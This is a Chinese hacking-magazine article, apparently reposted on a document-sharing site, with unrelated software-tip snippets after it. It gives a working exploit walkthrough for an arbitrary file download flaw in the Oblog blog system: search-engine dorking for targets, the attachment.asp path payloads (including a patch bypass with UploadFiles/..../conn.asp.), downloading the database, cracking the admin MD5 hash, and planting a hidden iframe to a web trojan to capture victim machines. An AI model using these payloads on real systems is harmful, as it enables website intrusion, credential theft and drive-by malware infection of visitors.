补了还漏,抓鸡要快 Oblog博客漏洞快速抓鸡

来源 :网友世界 | 被引量 : 0次 | 上传用户:zqlyn
下载到本地 , 更方便阅读
声明 : 本文档内容版权归属内容提供方 , 如果您对本文有版权争议 , 可与客服联系进行内容授权或下架
论文部分内容阅读
  最近各种网站程序总是漏洞不断,也不知是攻击者们挖洞太厉害,还是网站程序设计者们太粗心。尤其典型的是Oblog博客爆出的一个附件任意文件下载漏洞,导致攻击者可以任意下载网站中的数据库及各种机密信患文件,在短短的几天之内Oblog官方网站就将此漏洞补上了,可打过补丁之后,居然漏洞还存在!——不由让人困惑,漏洞频频,究竟是什么地方出了问题?
  
  第一爆,路径未过滤
  
  Oblog博客是一款国内应用非常广泛的博客系统,连国内许多大型的门户网站所提供的博客服务,都是在Oblog博客的基础上进行更改的。Oblog博客系统程序出现漏洞的话,后果是非常严重的。
  
  菜鸟要提升,需会简单分析
  最先爆出的Oblog博客系统漏洞,主要源于Oblog博客系统的附件下载功能,未进行严格的过滤判断,与致攻击者可以提交任意数据字符,突破下载限制。我们先来看看简单的漏洞代码,并作一个简单的分析。
  Oblog博客系统的附件下载功能,只要是通过“attachment.asp”程序文件实现的,可从网上下载Oblog源程序。用记事本打开“attachment.asp”文件。在源代码顶部,可以看到如下几句简单的代码:
  Path=Trim(Request(“path”))
  FilelD=Trim(Request(“FilelD”))
  这两句代码,是用于获取下载附件的路径和文件名的。其中只是用Trim函数过滤了文件名和路径中的空格,后的代码中未进行其它过滤操作,因此造成了漏洞的存在。
  
  小测试,抓内鸡
  了解了漏洞的简单原理。现在我们就来看看如何利用此漏洞,下载网站的数据库。并进行攻击的。由于此漏洞是存在于“Oblog v4.6 build 20080403”之前的版本中。所以需要先确定博客的版本。
  
  检测站点漏洞
  在百度或Google中,以关键字“Copy right byOblog.cn”进行搜索,可找到大量的结果。随便打开一个博客链接,在主页链接后面添加“ver.asp”以查看版本,例如这里的目标网站链接是“http://www.****.com/blog”,那么版本链接就应该是“http://www.****.com/blog/ver.asp”。在打开页面返回信息中,就可以看到当前的Oblog版本。在这里返回的是“4.60 FinalBuild20080103(access)”,因此可以确定该站点满足入侵攻击要求。
  
  下载Conn.asp
  首先,在网站注册一个用户名,并登录博客站点。因为下载附件前,首先会检测用户的Cookie信息是否登录。登录后才可以下载附件。登录成功后,转到自己的博客首页,将地址栏中的链接改为“attachment,asp?path=./conn.asp”。这里目标网站链接是“http://www.****.com/blog”,那么就改成“http://www.****.com/blog/attachment.asp?path=./conn.asp”。假如目标网站采用的是一级目录,链接地址形如“http://www.*****.com/”。则链接改为“http://www.****.com/attachment.asp?path=./conn.asp”。一定要注意链接的目录关系,否则可能下载不到文件。
  修改链接后,回车提交。可以看到弹出了一个下载对话框。点击“保存”按钮,将“conn,asp”文件保存到本地。用记事本打开。
  
  下载数据库
  其实“conn.asp”文件就是Oblog的数据库连接文件。用于设置数据库的路径和打开关闭等配置。打开该文件的事。找到如下代码:
  Sub link database()
  If Is_Sqldata=O Then
  Access数据库连接参数
  此处必须为以根目录开始,最前面必须为/号
  免费用户初次安装务必修改DATA目录的数据库名称
  db=“/data/oblog4.60.asp”
  其中的“db”定义的变量,就是路径库的数据地址了,这里为“/data/oblog4.60.asp”。再次在刚才浏览器窗口中。修改链接地址为“http://www.****.com/blog/data/oblog4.60.asp”,如果目标站点为一级目录的话,也作相应的修改。复制该链接到迅雷或网际快车之类的下载工具中,新建一个下载任务,即可下载保存网站的数据库。
  如果网数据库作了防下载处理,那么就只有用“http://www.****.com/blog/attachment.asp?path=./data/oblog4.60.asp”链接,在IE中提交后直接进行下载。
  
  破解管理员密码
  将下载后的数据库后缀名改为mdb,用Access或其它数据库查看工具打开。找到“oblog admin”表,打开此数据表后,在其中可以看到管理员的用户名及密码。管理员密码是用MD5过密的,因此需要进行破解,可以到一些MD5在线破解站点进行破解,也可以使用本地暴力破解工具解码。具体的方法就不多说,以前讲过很多。
  
  “版权”挂马
  用破解的管理员密码登录后台页面“admin/adrain_loqin.asp”,在后台管理页面中,点击左侧的“网站信息配置”栏目。右设置页面中,找到“网站信息配置”→“站点版权信息:”,在设置框中添加一句代码“iframe src=“http://www.baidu.com”width=Oheight=O/iframe”。即可实现在网站挂马。在实际操作过程中。需要将百度的链接改为自己的网页木马地址。至于网页木马的选择,曾介绍过的黑手刃网页木马,威力是非常强大的。相信很快就可以获得大量的肉鸡!
  
  第二爆,漏洞再现
  Oblog博客爆出的任意文件下载漏洞,没过几天官方就发布的新的补丁,但是打上补丁后。其实这个漏洞还是存在的!看看集成了新补丁的“attachment.asp”文件,看看与原来的文件有什么不同,发现在其中多出了如下代码:
  IflnStr(path,Oblog.CacheConfig(56))>0 Then
  downloadFile Server.MapPath(Path),1
  该句代码的作用,仅仅是判断用户提交的路径是否包含“UploadFiles”,如果是的话,那么就调用downloadfile函数下载文件。此时。使用前面的方法已经无法进行下载了。但是我们只需要修改一下提交的路径链接,同样还是可以下载的!
  例如上面的“http://www.****.com/blog/attachment.asp?path=./conn.asp”链接,可以改为如下:
  http://www.****.com/blog/attachment.asp?path=UploadFiles/..../conn.asp.
  注意,在上面的链接地址中,最后的asp后有一个“.”。是用于突破对文件格式的限制的。提交链接后。就可以再次成功的下载到数据库连接文件了。
  下载数据库后,再按与上面相同的方法,进入后台。在后台可以挂马,也可以直接获取Webshell,具体的方法在这里就不多说了。
其他文献
“KV2008小管家”是一款专为KV2008杀毒软件量身定做的功能辅助小工具(下载地址:http://www.downbank.cn/soft/4/46/2007/200711158060.htm),假如你电脑中正使用的是KV2008,就请全权交由它来帮你打理这款杀毒软件吧!而且操作格外简便,感兴趣的朋友,不妨一试。  首先在文件下载完毕之后,进行相应解压,进入到保存目录中,双击“KV2008Ma
期刊
相信很多朋友都有在学校机房挂QQ被发现的经历吧。通常,学校里的QQ都是官方版的。我们没法用老板键等隐藏方法隐藏。那我们就没法用QQ了么?其实QQ官方版本也是可以让我们隐藏的……  步骤1点击QQ界面上那个“+”按钮选择“界面隐藏”,然后就会得到一个很模糊的QQ界面。  步骤2最后,再单击“-”按钮让它最小化即可。此时在任务栏和桌面上就都找不到QQ的图标了。  步骤3当要显示QQ主界面时,单击调出Q
期刊
在平时用163邮箱写邮件时,有时会遇到与国外朋友沟通或需要查单词的情况,但每次都打开金山词霸等软件,显然太费周折。其实,只要用163邮箱中的“英汉互译”功能就可以解决这个问题。  在163邮箱里面就提供了英汉字典。而且还是最近热门的“有道海量词典”。使用起来也很简单。  步骤1登录163邮箱。点击“写信”开始写信。这时在邮件的上方,就可以看到一个“查字典”的按钮,这就是“有道海量词典”。  步骤2
期刊
以往如果自己要阅读PDF文档,需要借助AdobeReader这类专业的PDF文档阅读器来实现。要是有时碰到些特殊情况。比如说恰恰电脑中没安装这类软件。而自己又不想去下载安装的话。有什么简便的法子,能轻松阅读到PDF文档呢?其实很简单,如今在网上冒出了许多可以实现在线阅读PDF文档的网站,有需要的朋友,不妨试试。  步骤1在浏览器中打开“http://www.Ddfmenot.com/”这个站点,然
期刊
如果你需要制作调查表单。那么现在可以利用Google文档来完成,这份调查表单不仅制作简单,而且可以即时刷新调查结果,更妙的是并不需要切换到英文界面下即可操作。  使用Google帐号登录到Google文档的主页面,从“新建”菜单下选择“电子表格”。单击右侧的“共享”按钮,随后会弹出一个名为“Google文档”的网页对话框。在这里可以重新命名电子表格。例如“旅游去向调查”,确认之后会进入“共享此在线
期刊
相信很多朋友都开通了自己的QQ空间,定期更新日志自然是常事,甚至有些朋友还花费了不少的时间和精力去进行打扮,那么你是否希望自己对Qzone的更新信息及时发送出去,从而让更多的好友得以知晓?  其实,我们可以让自己的邮件在签名处显示Qzone的更新信息。操作也比较简单。首先请登录QQ邮箱,进入邮箱设置的“常规”页面。在“个性签名”小节中勾选“加入Qzone更新”复选框。最后当然还要单击页面底部的“保
期刊
只需要一段极其简单的代码,我们就可以在自己的帖子中显示看帖者的IP地址,更妙的是还会显示“你已经被我盯上了!!哈哈!”,是不是很有意思?  打开IE浏览器,访问“http://www.ip38.com/s.htm”,这里提供了HTML代码、VBB/Discuzi签名档代码两种类型的代码,前者可以在你的网站上显示来访者的lP和地区,后者则是在签名档显示浏览者的IP地址和地区,我们选择“B.VBB/D
期刊
这天好友打来电话,说她在QQ空间中上传了许多新的照片,要我有空时进去瞧瞧。好友拍了新的照片,当然要去看看了。可每次都要点开对方的QQ空间才能查看到,实在有些许麻烦,而且如果想下载这些图片的话。自己操作起来也不是很方便。难道就没有更简便的法子了吗?  可以试试“QQ相册下载器”这款小工具(下载地址:http://www.xdowns.com/soft/1/70/2007/Soft 37174.htm
期刊
KooMail(酷邮)是很多朋友都在使用的邮件收发工具。我们可以利用它对重要的邮件进行保护,这样在存在多个帐户的情况下,就不太容易被误删除了。  步骤1选中需要保护的邮件,左键单击那个蓝色的小圆点。注意不是右键,此时会看到一个弹出菜单(如图),排在第2位的就是“只读邮件”,确认之后即可生效。  步骤2然后这个蓝色的小圆点会暗淡下来。以后当这些被设置为“只读”的邮件被执行删除操作时。会弹出一个警示框
期刊
我们在网吧经常能找到自己喜欢的电影,苦于时间少网费贵,不能在网吧把电影都看了。所以我们都喜欢把电影用u盘或移动硬盘带到家里有时间慢慢看。这样问题就来了,现在大部分网吧的电影都不让随便复制,但只有你想不到的,没有做不到的,请看我是如何在网吧复制电影的。    首先说明一下主要思路那就是找到网吧电影的存放路径!!但找路径不是一件容易的事,下面的方法大家可以借鉴,当然也可以用局域网资源搜索器、网络嗅探器
期刊